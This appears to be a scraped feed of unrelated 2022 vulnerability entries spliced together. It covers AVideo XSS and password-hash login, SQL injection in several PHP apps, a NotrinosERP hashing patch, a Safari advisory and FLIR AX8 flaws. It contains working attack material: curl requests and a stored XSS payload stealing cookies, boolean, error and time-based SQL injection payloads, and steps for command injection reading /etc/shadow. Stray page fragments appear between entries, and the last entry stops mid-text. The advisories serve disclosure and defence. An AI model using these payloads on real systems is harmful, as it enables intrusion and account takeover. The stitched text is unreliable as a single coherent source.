A cross-site scripting (xss) vulnerability exists in the videoAddNew functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) vulnerability exists in the videoAddNew functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

By making a POST request to objects/videoAddNew.json.php it’s possible to add a new video in AVideo. This request can be performed by an authenticated user with video upload permissions.

    require_once 'video.php';
    
    // [1]
    if (!empty($_POST['id'])) {
        if (!Video::canEdit($_POST['id']) && !Permissions::canModerateVideos()) {
            die('{"error":"2 ' . __("Permission denied") . '"}');
        }
    }
    
    ...
    
    $obj = new Video($_POST['title'], "", @$_POST['id']); // [2]
    
    TimeLogEnd(__FILE__, __LINE__);
    
    $obj->setClean_Title($_POST['clean_title']);
    $audioLinks = ['mp3', 'ogg'];
    $videoLinks = ['mp4', 'webm', 'm3u8'];
    TimeLogEnd(__FILE__, __LINE__);
    // [3]
    if (!empty($_POST['videoLink'])) {
        //var_dump($config->getEncoderURL()."getLinkInfo/". base64_encode($_POST['videoLink']));exit;
        $path_parts = pathinfo($_POST['videoLink']);
        $extension = strtolower(@$path_parts["extension"]);
        // [4]
        if (empty($_POST['id']) && !(in_array($extension, $audioLinks) || in_array($extension, $videoLinks))) {
            $getLinkInfo = $config->getEncoderURL() . "getLinkInfo/" . base64_encode($_POST['videoLink']);
            _error_log('videoAddNew: '.$getLinkInfo);
            $info = url_get_contents($getLinkInfo, '', 180, true);
            $infoObj = _json_decode($info);
            $paths = Video::getNewVideoFilename();
            $filename = $paths['filename'];
            $filename = $obj->setFilename($filename);
            if (is_object($infoObj)) {
                $obj->setTitle($infoObj->title);     // [5]
                $obj->setClean_title($infoObj->title);
                $obj->setDuration($infoObj->duration);
                $obj->setDescription($infoObj->description);
                file_put_contents($global['systemRootPath'] . "videos/{$filename}.jpg", base64_decode($infoObj->thumbs64));
            }
            $_POST['videoLinkType'] = "embed";
        }
        // [4]
        elseif (empty($_POST['id'])) {
            $paths = Video::getNewVideoFilename();
            $filename = $paths['filename'];
            $filename = $obj->setFilename($filename);
            $obj->setTitle($path_parts["filename"]);   // [5]
            $obj->setClean_title($path_parts["filename"]);
            $obj->setDuration("");
            $obj->setDescription(@$_POST['description']);
            $_POST['videoLinkType'] = "linkVideo";
        }
        $obj->setVideoLink($_POST['videoLink']);
    ...
    // [6]
    $resp = $obj->save(true);
    

At \[1\], the code checks if the user making the request has permission to edit the video supplied via id (unless empty).  
At \[2\], a new Video object is created, whose class is defined in video.php.  
At \[3\], the code allows the user to send a videoLink parameter, containing a link to a video that will be downloaded by AVideo and stored as the new video being added.  
At \[4\], the code takes different paths depending on whether the videoLink contains a known extension. This path doesn’t matter for the purposes of this advisory; it’s enough to note that both paths set a title \[5\] that is not controlled by the parameters sent in the current request.  
Finally, the new video object is saved into the database \[6\].

Note that if paths at \[4\] are not taken, setTitle is not called, so the title set at \[2\] is the one that will be used for the video. In order to not take the paths at \[4\], it’s enough to edit a video by calling this same page again and supplying a video id. This way the two conditions at \[4\] are not satisfied, since $_POST['id'] is not empty, allowing a user to change the video password at will.

Let’s check what happens when creating the Video object at \[2\]:

    class Video {
    ...
    public function __construct($title = "", $filename = "", $id = 0) {
        global $global;
        $this->rotation = 0;
        $this->zoom = 1;
        if (!empty($id)) {
            $this->load($id);
        }
        if (!empty($title)) {
            $this->setTitle($title); // [7]
        }
        if (!empty($filename)) {
            $this->filename = $filename;
        }
    }
    

We see we’ll end up calling setTitle \[7\]:

    public function setTitle($title) {
        if ($title === "Video automatically booked" && !empty($this->title)) {
            return false;
        }
        $new_title = strip_tags($title);
        if (strlen($new_title) > 190) {
            $new_title = substr($new_title, 0, 187) . '...';
        }
        AVideoPlugin::onVideoSetTitle($this->id, $this->title, $new_title);
        $this->title = $new_title;
    }
    

Besides string truncation and a plugin hook, there’s no explicit sanitization of the video title.

getTitle is used as interface to retrieve the video object title, which simply returns the title property:

    public function getTitle() {
        return $this->title;
    }
    

The lack of sanitization does not represent a security issue at this stage. However, there’s no sanitization in a later stage, when the videos are presented on the page. The issue is in the function getVideosListItem in objects/video.php:

        public static function getVideosListItem($videos_id, $divID = '', $style = '') {
            ...
            $objGallery = AVideoPlugin::getObjectData("Gallery");
            $program = AVideoPlugin::loadPluginIfEnabled('PlayLists');
            $template = $global['systemRootPath'] . 'view/videosListItem.html';
            $templateContent = file_get_contents($template);
            $value = Video::getVideoLight($videos_id);     // [8]
            $link = Video::getLink($value['id'], $value['clean_title'], "", $get);
            if (!empty($_GET['page']) && $_GET['page'] > 1) {
                $link = addQueryStringParameter($link, 'page', $_GET['page']);
            }
    
            $title = $value['title']; // [9]
            ...
            // [10]
            if (!empty($imgGif)) {
                $imgGifHTML = '<img src="' . getCDN() . 'view/img/loading-gif.png" data-src="' . $imgGif .
                              '" style="position: absolute; top: 0; display: none;" alt="' . $title . 
                              '" id="thumbsGIF' . $videos_id . '" class="thumbsGIF img-responsive" height="130" />';
            }
            ...
            $search = [
                ...
                '{imgGifHTML}',
                '{timeHTML}',
                '{loggedUserHTML}',
                ...
            ];
    
            $replace = [
                ...
                $imgGifHTML,
                $timeHTML,
                $loggedUserHTML,
                ...
            ];
            $btnHTML = @str_replace($search,$replace,$templateContent); // [11]
            return $btnHTML;
        }
    

At \[8\] the requested video is fetched from the database, via the function getVideoLight:

        public static function getVideoLight($id) {
            global $global, $config;
            $id = intval($id);
            $sql = "SELECT * FROM videos WHERE id = ? LIMIT 1";
            $res = sqlDAL::readSql($sql, 'i', [$id], true);
            $video = sqlDAL::fetchAssoc($res);
            sqlDAL::close($res);
            return $video;
        }
    

At \[9\] the title is extracted from the row, meaning it’s unsanitized. At \[10\] the $title is inserted direcly in an HTML string, which is eventually inserted in a bigger template \[11\] and returned.

Any view that is using getVideosListItem will trigger the stored XSS, which includes the following files:

*   view/modeYoutubeBottomRight.php
*   view/videoViewsInfo.php
*   view/videosList.php

Any other page including the pages above will clearly also trigger the XSS. The simplest way to trigger it is to visit the page for the video that contains the XSS in its title. For example, when requesting https://192.168.1.200/video/123, where 123 is the video id, AVideo internally redirects the request to https://192.168.1.200/view/index.php?v=123. Eventually, view/videosList.php is included in the page.

This issue can be used by an attacker, in the worst case, to take over an administrator account. Note that while this requires user interaction, it is very easy to trigger because the video list items are printed via several different pages.

**Exploit Proof of Concept**

First, an attacker can create a video by importing a video (https://192.168.1.200/video/48) already present in the platform.

    curl -k --cookie '84b11d010cced71edffee7aa62c4eda0=uot19510578r10nohk91j0sunb' --data-raw 'public=true&only_for_paid=false&videoLink=https://192.168.1.200/video/48' 'https://192.168.1.200/objects/videoAddNew.json.php'
    
    {
        "status": true,
        "msg": "",
        "info": "...",
        "videos_id": 135,
        "video":
        {
            "id": 135,
            "title": "sample",
            "clean_title": "sample",
            "description": "",
            ...
            "videoLink": "https://192.168.1.200/video/48",
            "next_videos_id": null,
            "isSuggested": 0,
            ...
        },
        "clearFirstPageCache": true
    }
    

A video has been created with id 135. The title is taken from the video with id 48; however, it can be changed with an XSS payload:

    curl -k --cookie '84b11d010cced71edffee7aa62c4eda0=uot19510578r10nohk91j0sunb' --data-raw 'id=133&title=%22+style=%22animation-name:bounce%22+onanimationstart=%22alert(document.cookie)%22' 'https://192.168.1.200/objects/videoAddNew.json.php'
    

Because the video list can be hidden, the Javascript might not trigger. An attacker can bypass this by using the onanimationstart event, to force the browser to execute any Javascript code on page load.

At this point the XSS has been stored, and it can be triggered by any user that visits the page https://192.168.1.200/video/135.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-28712: TALOS-2022-1540 || Cisco Talos Intelligence Group

An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users' password hash will be able to use it to directly login into the account, leading to increased privileges.

**SUMMARY**

An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users’ password hash will be able to use it to directly login into the account, leading to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-836 - Use of Password Hash Instead of Password for Authentication

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo, by default, saves a user’s password as a salted hash in the database. When a user tries to login, the function login, defined in the User class in objects/user.php, is called:

    public function login($noPass = false, $encodedPass = false, $ignoreEmailVerification = false) {
        if (User::isLogged()) {
            return false;
        }
        ...
        if (strtolower($encodedPass) === 'false') {
            $encodedPass = false;
        }
        //_error_log("user::login: noPass = $noPass, encodedPass = $encodedPass, this->user, $this->user " . getRealIpAddr());
        if ($noPass) {
            $user = $this->find($this->user, false, true);
        } else {
            $user = $this->find($this->user, $this->password, true, $encodedPass);
        }
        ...
    

Password check is relayed to the find function, passing user and password as arguments:

    private function find($user, $pass, $mustBeactive = false, $encodedPass = false) {
        ...
        $sql = "SELECT * FROM users WHERE user = ? ";
        ...
        $sql .= " LIMIT 1";
        $res = sqlDAL::readSql($sql, $formats, $values, true);
        $result = sqlDAL::fetchAssoc($res);
        sqlDAL::close($res);
        if (!empty($result)) {
            if ($pass !== false) {
                if (!encryptPasswordVerify($pass, $result['password'], $encodedPass)) { // [1]
                    if (!empty($advancedCustom) && $advancedCustom->enableOldPassHashCheck) {
                        _error_log("Password check new hash pass does not match, trying MD5");
                        return $this->find_Old($user, $pass, $mustBeactive, $encodedPass);
                    } else {
                        return false;
                    }
                }
            }
            $user = $result;
        } else {
            _error_log("Password check new hash user not found");
            //check if is the old password style
            $user = false;
            //$user = false;
        }
        return $user;
    

The function fetches the user record from the database, and uses encryptPasswordVerify to check if the password matches:

    function encryptPasswordVerify($password, $hash, $encodedPass = false) {
        global $advancedCustom, $global;
        if (!$encodedPass || $encodedPass === 'false') {
            //_error_log("encryptPasswordVerify: encrypt");
            $passwordSalted = encryptPassword($password);
            // in case you enable the salt later
            $passwordUnSalted = encryptPassword($password, true);
        } else {
            //_error_log("encryptPasswordVerify: do not encrypt");
            $passwordSalted = $password;
            // in case you enable the salt later
            $passwordUnSalted = $password;
        }
        //_error_log("passwordSalted = $passwordSalted,  hash=$hash, passwordUnSalted=$passwordUnSalted");
        return $passwordSalted === $hash || $passwordUnSalted === $hash || $password === $hash; // [2]
    }
    

The password is encrypted in the same way it was stored in the database (using encryptPassword), however this function allows 3 different passwords to match: the salted hash of $password, the unsalted hash of $password, and whatever hash is stored in the database (the $password === $hash). This means that the hash as stored in the database can be used as a password to login. Any SQL injection vulnerability can thus be used to dump the administrator’s password hash and use that exact hash to login via the web interface.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-32282: TALOS-2022-1545 || Cisco Talos Intelligence Group

A vulnerability classified as critical has been found in SourceCodester Gym Management System. This affects an unknown part of the file login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-206451.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-2842: CVE/Gym Management System-loginpage-Sqlinjection.pdf at main · WhiteA1so/CVE

Personnel Property Equipment 2015-2022 suffers from a remote SQL injection vulnerability.

    ## Title: Personnel Property Equipment-2015-2022 SQLi,Unauthenticated-File-Upload## Author: nu11secur1ty## Date: 08.22.2022## Vendor Homepage: https://www.trickcode.in/## Video vendor: https://www.youtube.com/watch?v=ltSwom8sQAQ## Software https://www.trickcode.in/2021/03/personnel-property-equipment-system.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment## Description:The parameter `username` is vulnerable to SQLi boolean-based blind andUnauthenticated-File-Upload.The attacker can take all information from this system by using thesevulnerabilities.Status: Highly Vulnerable[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=eFysrSeT''' OR NOT 4417=4417 OR'xXab'='cbaw&password=v9A!p7s!C0    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=eFysrSeT''' OR (SELECT 1050 FROM(SELECTCOUNT(*),CONCAT(0x7162716271,(SELECT(ELT(1050=1050,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'wmfc'='yfBD&password=v9A!p7s!C0    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=eFysrSeT''' AND (SELECT 4473 FROM(SELECT(SLEEP(5)))Pghj) OR 'lxYt'='fefH&password=v9A!p7s!C0---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment)## Proof and Exploit:[href](https://streamable.com/4yavk4)

Personnel Property Equipment 2015-2022 SQL Injection

The Better Search Replace WordPress plugin before 1.4.1 does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users to perform SQL Injection attacks

CVE-2022-2593

Multiple SQL injections detected in Bus Pass Management System 1.0 via buspassms/admin/view-enquiry.php, buspassms/admin/pass-bwdates-reports-details.php, buspassms/admin/changeimage.php, buspassms/admin/search-pass.php, buspassms/admin/edit-category-detail.php, and buspassms/admin/edit-pass-detail.php

**Project Name**

Bus Pass Management System Project

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

Bus Pass Management Project in Php is a web-based technology that will manage the records of the pass which is issue by administrative and also help to provide online bus pass to people who need to travel daily. Bus Pass Management System project is helpful to bus administration by reducing the paperwork, time consumption and makes the process of getting bus passes as simple and fast.

Bus Pass Management system uses PHP and MySQL databases. This is the project which keeps records of the pass which is issue by the administrative. Bus Pass Management system has two modules i.e. admin and user.

**Admin**

**Dashboard**: In this sections, admin can briefly view the total number of categories and how many passes will be generated in one day, yesterdays and the last seven’s days

**Category**: In this section, admin can manage the category (add/update).

**Passes**: In this section, admin can manage pass(add/update/take print pass).

**Pages:** In this section, admin can update about us and contact us pages.

**Enquiry:** In this section, admin reads the inquiries which are sent by users.

**Reports**: In this section admin can generate pass reports between two dates.

**Search**: In this section, admin can search a particular pass bypass number.

Admin can also update his profile, change the password and recover the password.

**User**

1.  **Home Page:** User can visit home page.
2.  **View Pass:** User can view his/her pass and take print with the help of their Pass Number.
3.  **About Us**: User sees the details of .website administrator.
4.  **Contact Us**: User can contact with website administrator.

**Note**:  In this project, the MD5 encryption method was used.

**Some of the Bus Pass Management Project Screens**

**Home Page**

**Home Page**

**Pass Details**

Pass Details

**Admin Dashboard**

**Admin Dashboard**

**Add/Create Pass**

**Add/Create Pass**

**How to run the Bus Pass Management System Project Using PHP and MySQL**

*   Download the zip file
*   Extract the file and copy buspassms folder
*   Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
*   Open PHPMyAdmin (http://localhost/phpmyadmin)
*   Create a database with name buspassdb
*   Import buspassdb.sql file(given inside the zip package in SQL file folder)
*   Run the script http://localhost/buspassms

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**Pass number:** 681924385 or you can create a new pass.

**+++++++++++++++++View Demo+++++++++++++++++++++**

Download Full Source Code (Bus Pass Management System)

Size: 2.43 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-36198: Bus Pass Management System in Php | Bus Pass Management Project Using PHP

This will lead to privilege escalation from AP officers account to the System Administrator account. and gain more functionality such as Create/Update Companies. Install/Update Languages. Install/Activate Extensions. Install/Activate Themes. Install/Activate Chart of Accounts. Software Upgrade.

@@ -25,7 +25,7 @@ function can\_process() {

$Auth\_Result = hook\_authenticate($\_SESSION\['wa\_current\_user'\]->username, $\_POST\['cur\_password'\]);

  

if (!isset($Auth\_Result)) // if not used external login: standard method

$Auth\_Result = get\_user\_auth($\_SESSION\['wa\_current\_user'\]->username, md5($\_POST\['cur\_password'\]));

$Auth\_Result = authenticate\_user($\_SESSION\['wa\_current\_user'\]->username, $\_POST\['cur\_password'\]);

  

if (!$Auth\_Result) {

display\_error( \_('Invalid password entered.'));

@@ -57,7 +57,7 @@ function can\_process() {

if ($SysPrefs\->allow\_demo\_mode)

display\_warning(\_('Password cannot be changed in demo mode.'));

else {

update\_user\_password($\_SESSION\['wa\_current\_user'\]->user, $\_SESSION\['wa\_current\_user'\]->username, md5($\_POST\['password'\]));

update\_user\_password($\_SESSION\['wa\_current\_user'\]->user, $\_SESSION\['wa\_current\_user'\]->username, password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT));

display\_notification(\_('Your password has been updated.'));

}

$Ajax\->activate('\_page\_body');

@@ -86,4 +86,4 @@ function can\_process() {

  

submit\_center( 'UPDATE\_ITEM', \_('Change password'), true, '', 'default');

end\_form();

end\_page();

end\_page();

@@ -20,7 +20,7 @@

  

page(\_($help\_context = 'Create/Update Company'));

  

$comp\_subdirs = array('images', 'pdf\_files', 'backup','js\_cache', 'reporting', 'attachments');

$comp\_subdirs = array('images', 'pdf\_files', 'backup', 'js\_cache', 'reporting', 'attachments');

  

simple\_page\_mode(true);

/\*

@@ -107,7 +107,7 @@ function handle\_submit($selected\_id) {

  

$conn = $db\_connections\[$selected\_id\];

if (($db = db\_create\_db($conn)) === false) {

display\_error(\_('Error creating Database: ') . $conn\['dbname'\] . \_(', Please create it manually'));

display\_error(\_('Error creating Database: ').$conn\['dbname'\].\_(', Please create it manually'));

$error = true;

}

else {

@@ -120,7 +120,7 @@ function handle\_submit($selected\_id) {

else {

if (!isset($\_POST\['admpassword'\]) || $\_POST\['admpassword'\] == '')

$\_POST\['admpassword'\] = 'password';

update\_admin\_password($conn, md5($\_POST\['admpassword'\]));

update\_admin\_password($conn, password\_hash($\_POST\['admpassword'\]), PASSWORD\_DEFAULT);

}

}

if ($error) {

@@ -350,4 +350,4 @@ function display\_company\_edit($selected\_id) {

  

end\_form();

  

end\_page();

end\_page();

@@ -112,12 +112,29 @@ function delete\_user($id) {

  

//-----------------------------------------------------------------------------------------------

  

function get\_user\_auth($user\_id, $password) {

function authenticate\_user($user\_id, $password) {

  

$sql = "SELECT \* FROM ".TB\_PREF."users WHERE user\_id = ".db\_escape($user\_id)." AND"

." password=".db\_escape($password);

$sql1 = "SELECT password FROM ".TB\_PREF."users WHERE user\_id = ".db\_escape($user\_id);

  

return db\_num\_rows(db\_query($sql, 'could not get validate user login for '.$user\_id)) != 0;

$result = db\_query($sql1, 'could not get user login for '.$user\_id);

  

if(db\_num\_rows($result) == 0)

return false;

  

$hash = db\_fetch($result)\[0\];

  

// The user's password hash may have been created long ago by md5 password algorithm on the old NotrinosERP versions

if(password\_verify($password, $hash) || $hash == md5($password)) {

if(password\_needs\_rehash($hash, PASSWORD\_DEFAULT) === true) {

$new\_hash = password\_hash($password, PASSWORD\_DEFAULT);

$sql2 = "UPDATE ".TB\_PREF."users SET password = ".db\_escape($new\_hash)." WHERE user\_id = ".db\_escape($user\_id);

db\_query($sql2, 'could not update password hash for '.$user\_id);

}

  

return true;

}

  

return false;

}

  

//-----------------------------------------------------------------------------------------------

@@ -56,12 +56,12 @@ function can\_process($new) {

update\_user\_prefs($selected\_id, get\_post(array('user\_id', 'real\_name', 'phone', 'email', 'role\_id', 'language', 'print\_profile', 'rep\_popup' => 0, 'pos')));

  

if ($\_POST\['password'\] != '')

update\_user\_password($selected\_id, $\_POST\['user\_id'\], md5($\_POST\['password'\]));

update\_user\_password($selected\_id, $\_POST\['user\_id'\], password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT));

  

display\_notification\_centered(\_('The selected user has been updated.'));

}

else {

add\_user($\_POST\['user\_id'\], $\_POST\['real\_name'\], md5($\_POST\['password'\]), $\_POST\['phone'\], $\_POST\['email'\], $\_POST\['role\_id'\], $\_POST\['language'\], $\_POST\['print\_profile'\], check\_value('rep\_popup'), $\_POST\['pos'\]);

add\_user($\_POST\['user\_id'\], $\_POST\['real\_name'\], password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT), $\_POST\['phone'\], $\_POST\['email'\], $\_POST\['role\_id'\], $\_POST\['language'\], $\_POST\['print\_profile'\], check\_value('rep\_popup'), $\_POST\['pos'\]);

$id = db\_insert\_id();

// use current user display preferences as start point for new user

$prefs = $\_SESSION\['wa\_current\_user'\]->prefs\->get\_all();

@@ -69,11 +69,11 @@ class current\_user {

  

// Use external authentication source if any.

// Keep in mind you need to have user data set for $loginname

// in FA users table anyway to successfully log in.

// in NotrinosERP users table anyway to successfully log in.

$Auth\_Result = hook\_authenticate($loginname, $password);

  

if (!isset($Auth\_Result)) // if not used: standard method

$Auth\_Result = get\_user\_auth($loginname, md5($password));

$Auth\_Result = authenticate\_user($loginname, $password);

if ($SysPrefs\->login\_delay > 0)

write\_login\_filelog($loginname, $Auth\_Result);

if ($Auth\_Result) {

@@ -151,7 +151,7 @@ class current\_user {

if ($user != false) {

  

$password = generate\_password();

$hash = md5($password);

$hash = password\_hash($password);

  

update\_user\_password($user\['id'\], $user\['user\_id'\], $hash);

  

**0 comments on commit 1b9903f**

Please sign in to comment.

CVE-2022-2921: changed password hash method from md5 to bcrypt. · notrinos/NotrinosERP@1b9903f

Project-nexus is a general-purpose blog website framework. Affected versions are subject to SQL injection due to a lack of sensitization of user input. This issue has not yet been patched. Users are advised to restrict user input and to upgrade when a new release becomes available.

**Impact**

_If a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries._

**Patches**

_Yet to be patched._

**Workarounds**

_Most database connector libraries offer a way of safely embedding untrusted data into a query using query parameters or prepared statements._

_For NoSQL queries, make use of an operator like MongoDB's $eq to ensure that untrusted data is interpreted as a literal value and not as a query object._

**References**

*   _Wikipedia: SQL Injection_
*   _MongoDB: $eq operator_
*   _Common Weakness Enumeration: CWE-89_
*   _Common Weakness Enumeration: CWE-90_
*   _Common Weakness Enumeration: CWE-943_

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Project Nexus
*   Email us at zrexteam128@gmail.com

CVE-2022-36030: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') and Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') and Improper Neutralizatio

Apple Security Advisory 2022-08-18-1 - Safari 15.6.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-08-18-1 Safari 15.6.1

Safari 15.6.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213414.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Safari 15.6.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmL+gHUACgkQ4RjMIDke  
Nxm9eg/8CZFhmd5zgsQlwjn4R9kWVnIHCIzkhmjQGMzQ3C1FCiMwt+aDN2C1aYxN  
DiElfQy6ieI+4RNTxuNakhAQ0lS7F+TStHW9meblHkIA/qFfhBVxyaWZr+Hl0Bsw  
2K+0D9twK6xqh88hlvdm/GGEkEv8pKXKtzWaDoOdutXtasG6apc2nAMcqcWyN3SE  
hw+/PXhnxY5TNDQsz4wYsriichEPHIPJh3tCEgV2EvfsYx3GrX8Yga3T34GHwSj7  
H04Q3P1vNkdDDziFV7gZuWVXqKrpQxnReIKtZzffO0cW2x7lsSKw3H70yHlh2JLL  
yUDP28jJXOFGHD3izx+YHmFB4Q4dcHSVsil39Mq150s5iyJSkO2YDgWCyZBQ1tuB  
/dLIGuuQQtA3CqzBPSKneeeb0Cf5I6dnjh93R/aXLNiy+1AvizxJFOJ+EAlDCOxt  
o85iZxjWaGaQxng3qeA5nex5QWUvXRPyXoxyxnkfEeswv7PX6XLQXTASIo/Ug3E8  
KcIbtnkPatuwHt44eprrW6afaWhiY2IhiLKRFQeDm5vtYOr0FDAWGKl9bW203Frt  
2o6TVP9uXxZRIfMUmxBjdvNFScez49vlU6v+cIjj8UON/lWKZLkLDEFxfCWxlAWK  
eTc6a0tIAP5EMyd7EZdVhvxJSMxcCrXiO2iiS5TccIFZ5VvgZwA=t1cZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-18-1

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

